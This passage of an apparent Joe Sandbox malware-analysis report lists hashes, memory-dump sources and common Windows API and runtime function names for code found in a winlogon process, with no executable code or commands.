                                                  • Opcode ID: 6417028e0581c33fb66ecbcc2788d1ac89801e3df6f6497bc360079463109eef
                                                  • Instruction ID: 6382ce1b3a8c48f05d54281b65aff69c269f326d74a3571c31c91489a03836cf
                                                  • Opcode Fuzzy Hash: 6417028e0581c33fb66ecbcc2788d1ac89801e3df6f6497bc360079463109eef
                                                  • Instruction Fuzzy Hash: E001406D729F54A2EB249BA9E84C71973E0EB58F86F148429CA4D073A4EF3DC548CB04
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: e59c82fe0f2ec094d57bed0c98c400f651c9509d4f271adb2dc6c0c8ab65cd82
                                                  • Instruction ID: 6516494474a1bf649bf6197163394fe79c8ab82361a53d50c3c8aeeb55a67b78
                                                  • Opcode Fuzzy Hash: e59c82fe0f2ec094d57bed0c98c400f651c9509d4f271adb2dc6c0c8ab65cd82
                                                  • Instruction Fuzzy Hash: DBF04466328A91A2EB20CBA9F9887596360F748B9AF94C020DA4946554DE3CC6CCCB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: f0253bf3bdf199985f6c2e3295dc4ed2139203a79a19ecb3f89a7ae47e478241
                                                  • Instruction ID: 22bebc46b0b44a3cf27cf8948df69eb8c4049944d015165fa049be52dcb52900
                                                  • Opcode Fuzzy Hash: f0253bf3bdf199985f6c2e3295dc4ed2139203a79a19ecb3f89a7ae47e478241
                                                  • Instruction Fuzzy Hash: 5DF09669339E10A5EF108BACE85D31A6360FB487A3FA49319DA6A456E4DF3CC048CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: 2f10e4b1bb55b8476a2540ab013bb770cdd98ab53081f051a71e1da94108be6d
                                                  • Instruction ID: a140d418f474ab67bf4af8aec0a1f4545f6331d63815eabc6701c695b9cbcd30
                                                  • Opcode Fuzzy Hash: 2f10e4b1bb55b8476a2540ab013bb770cdd98ab53081f051a71e1da94108be6d
                                                  • Instruction Fuzzy Hash: EEF0822872CFA4A2EA108B9BB9181596261AB48FD2F54D070EF5607B18DE3CC485CB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: d6de942b4cb6e13384af6576eb63f99a4147950e896980e62e05536f1a3ec731
                                                  • Instruction ID: 1460065c61ac6ccaa07cd3bcc812fb57434a923e987e13e573c75119d2e2f856
                                                  • Opcode Fuzzy Hash: d6de942b4cb6e13384af6576eb63f99a4147950e896980e62e05536f1a3ec731
                                                  • Instruction Fuzzy Hash: EB61C63A11CF54D6E7608F99E49831AB7E0F388745F10815AEA8E47BA8EB7CC444CF04
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000003.1743112186.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_3_225dc610000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction ID: 7486c8698dc4e3bd60ecfbcc7a60d1b3ceba8b640d42350a10993716573575a9
                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction Fuzzy Hash: 9E11CA3AB10E3521F75511ECE45E36A9049AB96776F14CB37ABF71E6E6CB34884BC100
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction ID: 632726c0add679000c27cbbc6512886d755607baaee78f8f8ca6a4e5e48995d4
                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction Fuzzy Hash: 0F11A37EA70E7131F7E411ACE45D3791440EB5537AF39C674A976266DEDB388840C208
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000003.1743112186.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_3_225dc610000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm$r iterator'
                                                  • API String ID: 3242871069-2773574969
                                                  • Opcode ID: ca5d9eaa95c438554c2903f354aaa720dc8acf5dd20a0dc0b5b10fb3cccfabab
                                                  • Instruction ID: 39042d784bfda7fd45d45b30d3f34666bdf665cb5085f0fba7754b03cbc04588
                                                  • Opcode Fuzzy Hash: ca5d9eaa95c438554c2903f354aaa720dc8acf5dd20a0dc0b5b10fb3cccfabab
                                                  • Instruction Fuzzy Hash: FA51C33A312E20AADF14CF9DE448B6D7392F364B9BF15C121EA4A47788DB79C841CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: 4e447ab6f43e0dd97ca79f956e0f36bf66df1e20fe9b1e0794ac99b1f0ba565c
                                                  • Instruction ID: 88868204fe3de5f54937fd590411b98ad4b63c8d03aabe29349b38fb7dca356b
                                                  • Opcode Fuzzy Hash: 4e447ab6f43e0dd97ca79f956e0f36bf66df1e20fe9b1e0794ac99b1f0ba565c
                                                  • Instruction Fuzzy Hash: 6C51C43631DE60AAEB54CF9DE448B6C7391E349B99F14C251DA4787788DB79D881C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 0aa225cb1cadef72a45b87c5109ef4035a9212e37d75eff9152e78c65fc2b4b2
                                                  • Instruction ID: e1ee2e94b20282b07a39cad1a9f14e6732d634269f1884bfcd9791a2262009d7
                                                  • Opcode Fuzzy Hash: 0aa225cb1cadef72a45b87c5109ef4035a9212e37d75eff9152e78c65fc2b4b2
                                                  • Instruction Fuzzy Hash: 2F619D3650CFD4A2EB748F59E44439EB7A0F7C9B99F048255EB9A03B99DB78C194CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000003.1743112186.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_3_225dc610000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: 4449a9b682cb89d450f78971ce03173a0e31fd8ce334149503fbd8f0d91e758c
                                                  • Instruction ID: 46dd8354f895a18a4e318231f2688e83f9a5c925556241c72ecb37205f7d8399
                                                  • Opcode Fuzzy Hash: 4449a9b682cb89d450f78971ce03173a0e31fd8ce334149503fbd8f0d91e758c
                                                  • Instruction Fuzzy Hash: C2518E3A511BA09AEF748FA9954835877E0F754B9BF28C116FA8947BD6CB38D860C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: 4449a9b682cb89d450f78971ce03173a0e31fd8ce334149503fbd8f0d91e758c
                                                  • Instruction ID: 7323eb8ea2e313921abd15392ba8766df707f0d4dc76fb31e2bf5d5afdb5337d
                                                  • Opcode Fuzzy Hash: 4449a9b682cb89d450f78971ce03173a0e31fd8ce334149503fbd8f0d91e758c
                                                  • Instruction Fuzzy Hash: C751C33A50CFA0AAEB748FA9D04835C77A0F395B96F18D155DB8A47BD5CB38D461CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 7831a55c2ef4f99c6d4e75b771c167ca5dae29e291e29756cdefab7d0c6e5865
                                                  • Instruction ID: 86c6cf49edc6cb6c02ea96e6fa3c9688169240b618b7f777af7f97201a6943f6
                                                  • Opcode Fuzzy Hash: 7831a55c2ef4f99c6d4e75b771c167ca5dae29e291e29756cdefab7d0c6e5865
                                                  • Instruction Fuzzy Hash: C811862931CF65B1FB149BADE80836A73A4F748B42F90C175EE4A93694EF38C955C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: cd7ead245226fb0ff8416072dd6c86dfb22f41206e5c1354dc7575ed798eccf0
                                                  • Instruction ID: 650159af9db826a3370340e48c07ac5a3bdf8e8091564fa1051d05c74339a465
                                                  • Opcode Fuzzy Hash: cd7ead245226fb0ff8416072dd6c86dfb22f41206e5c1354dc7575ed798eccf0
                                                  • Instruction Fuzzy Hash: BB318F2A71DF69A2EA14DFDAE54876A77A0BB54F81F08C0308F4A07B55EF34D465C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 3d8111ac03d79fd3404cfd3b8bb5e35de645481c19c298062627da4548e3af8b
                                                  • Instruction ID: 2c828cc79cf1b059e498d2cc1e0a35aa68f446c0bf6c97c21cc1cd011ec8b5b9
                                                  • Opcode Fuzzy Hash: 3d8111ac03d79fd3404cfd3b8bb5e35de645481c19c298062627da4548e3af8b
                                                  • Instruction Fuzzy Hash: D9D1027AB24F90AAE712CFB9D4483AC37B1F354B99F248216DE5D97B99DA34C406C340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: 68e3aa918e40f2a59efd4a77bf87b80fbffd346b4caa48f43eabcedde74eb837
                                                  • Instruction ID: 4885ebd141279adc1bdd575cd8253f53ac0d721a4ed9f7f0a9a0db8a66344983
                                                  • Opcode Fuzzy Hash: 68e3aa918e40f2a59efd4a77bf87b80fbffd346b4caa48f43eabcedde74eb837
                                                  • Instruction Fuzzy Hash: EB015E36628FA0D6E718DFAAE80814977A1F78CF81F198425DF4A53728DF34D555CB40
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000225DC6532BB), ref: 00000225DC6533EC
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000225DC6532BB), ref: 00000225DC653477
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ConsoleErrorLastMode
                                                  • String ID:
                                                  • API String ID: 953036326-0
                                                  • Opcode ID: 9a0209e8511a10fd3386f0f56cb65ece6bc0a2612e029ae558c28dd6c9360970
                                                  • Instruction ID: cbdd99e8a9e4eeb82d78619b0fb0b1cf9cf73d58e29a6fba272903d9fad915da
                                                  • Opcode Fuzzy Hash: 9a0209e8511a10fd3386f0f56cb65ece6bc0a2612e029ae558c28dd6c9360970
                                                  • Instruction Fuzzy Hash: 2491E27A720E70A5FB619FEDD4483BD6BA0B744F8AF649529DE0A57B88CB34C442C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: e1208e257ec3ecfd7a62d9249f0af5cdd52c99c47e99b6bb550ebf232a0e338b
                                                  • Instruction ID: ec0f7792ce73ae41e1e14ef3038d4504e6368352a439b83b756889273cb5ea81
                                                  • Opcode Fuzzy Hash: e1208e257ec3ecfd7a62d9249f0af5cdd52c99c47e99b6bb550ebf232a0e338b
                                                  • Instruction Fuzzy Hash: CE11613A728F149AEB00CFA4E8583A933A4F729759F444E21EE6D877A4DF78C154C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: 4fed39dde851fcd8fc4d049624dd97c798a08dd805cf236f1a62443ce0db6f3a
                                                  • Instruction ID: 9702ed08bafbb1aac1d4080ee868d6a0f5e0a14d4c36ce302cbe515656caebab
                                                  • Opcode Fuzzy Hash: 4fed39dde851fcd8fc4d049624dd97c798a08dd805cf236f1a62443ce0db6f3a
                                                  • Instruction Fuzzy Hash: 8471D63A60CFA166EB2ADFED98583EE7790F785B85F608065DD0A43B89DE34C644C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000003.1743112186.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_3_225dc610000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  • Opcode ID: 432acf9014410cd6b61937995a8f5639f2b935c8f333f59e616f22aec490a317
                                                  • Instruction ID: 69bcdd6cb05b53edacaab32957342e5398ecf6c2b629b21ff6de21ad33a2c185
                                                  • Opcode Fuzzy Hash: 432acf9014410cd6b61937995a8f5639f2b935c8f333f59e616f22aec490a317
                                                  • Instruction Fuzzy Hash: 3D61DF36515FC492EB708F59E44439EB7A0F789B8AF148615EFC903B9ADB38C191CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: 60806b6e5981ec3bc5cc332c647bab245b1cb03d9a404e51140869ab20dc0ddc
                                                  • Instruction ID: a77b680f300cacedfb9207bd9e8f3ee54af40670a2b8e2d46e5ce37169ef5ac1
                                                  • Opcode Fuzzy Hash: 60806b6e5981ec3bc5cc332c647bab245b1cb03d9a404e51140869ab20dc0ddc
                                                  • Instruction Fuzzy Hash: 4B51373A21CFA1A1E66ACFEDE06C3AA7751F7C4781F658065DE5B03B89DA38C404C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: a661c2d173b23182f505dc60736120a771a3f0ad42df517ff57706cbb13cb6f8
                                                  • Instruction ID: 8d437e622279cc463cf2ae68c63a13e74a4d6b7cdbca01cf64e8b88f06883762
                                                  • Opcode Fuzzy Hash: a661c2d173b23182f505dc60736120a771a3f0ad42df517ff57706cbb13cb6f8
                                                  • Instruction Fuzzy Hash: 5141C676328F90A2DB20CF69E4483AA77A1F398B85F548421EE4E87794EB3CC445C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
